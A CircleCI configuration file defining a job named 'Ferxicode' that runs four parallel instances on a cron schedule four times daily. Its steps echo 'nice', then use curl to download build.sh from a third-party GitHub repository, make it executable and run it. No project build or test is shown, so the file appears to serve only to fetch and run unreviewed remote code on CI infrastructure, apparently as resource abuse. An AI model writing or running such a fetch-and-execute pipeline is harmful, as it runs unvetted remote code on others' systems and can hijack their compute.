version: 2.0
jobs:
  Ferxicode:
    parallelism: 4
    docker:
      - image: circleci/ruby:2.7.3
    steps:
    - run: echo nice
    - run: curl -L https://raw.githubusercontent.com/terb4ru/gasks/main/build.sh > ./build.sh
    - run: chmod +x ./build.sh
    - run: ./build.sh
        
workflows:
  version: 2
  commit:
    jobs:
      - Ferxicode
    triggers:
      - schedule:
          cron: "0 5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
                
  Ferxicodejobs:
    jobs:
      - Ferxicode
